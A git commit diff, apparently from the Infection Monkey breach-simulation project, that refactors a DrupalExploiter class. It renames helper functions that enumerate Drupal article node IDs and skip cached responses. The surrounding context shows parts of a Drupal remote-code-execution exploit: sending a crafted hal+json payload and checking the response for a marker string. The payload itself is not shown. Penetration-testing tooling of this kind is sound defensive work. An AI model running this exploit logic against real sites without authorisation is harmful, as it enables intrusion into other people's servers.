Merge branch '669/drupal' of https://github.com/guardicore/monkey into 669/drupal

This commit is contained in:
Shay Nehmad 2020-09-01 12:17:33 +03:00
commit 5a00d5e5f9
1 changed files with 14 additions and 15 deletions

View File

@ -45,7 +45,7 @@ class DrupalExploiter(WebRCE):
:return: None (in-place addition) :return: None (in-place addition)
""" """
for url in potential_urls: for url in potential_urls:
node_ids = find_articles(url) node_ids = find_exploitbale_article_ids(url)
if node_ids is None: if node_ids is None:
LOG.info('Could not find a Drupal node to attack') LOG.info('Could not find a Drupal node to attack')
continue continue
@ -73,7 +73,7 @@ class DrupalExploiter(WebRCE):
json=payload, json=payload,
headers={"Content-Type": "application/hal+json"}) headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(response): if is_response_cached(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
return False return False
@ -89,7 +89,7 @@ class DrupalExploiter(WebRCE):
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(r): if is_response_cached(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed') LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
if ID_STRING not in r.text: if ID_STRING not in r.text:
@ -108,23 +108,22 @@ class DrupalExploiter(WebRCE):
return self.vulnerable_urls.pop() return self.vulnerable_urls.pop()
def check_drupal_cache(r: requests.Response) -> bool: def is_response_cached(r: requests.Response) -> bool:
""" """ Check if a response had the cache header. """
Check if a response had the cache header.
"""
return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT' return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
def find_articles(base_url: str, lower: int = 1, upper: int = 10): def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 10) -> set:
""" Find a target article that does not 404 and is not cached """ """ Find target articles that do not 404 and are not cached """
articles = set() articles = set()
while lower < upper: while lower < upper:
u = urljoin(base_url, str(lower)) node_url = urljoin(base_url, str(lower))
r = requests.get(u) response = requests.get(node_url)
if r.status_code == 200: # found an article if response.status_code == 200:
articles.add(lower) if is_response_cached(response):
if check_drupal_cache(r): LOG.info(f'Found a cached article at: {node_url}, skipping')
LOG.info(f'Found a cached article at: {lower}, skipping') else:
articles.add(lower)
lower += 1 lower += 1
return articles return articles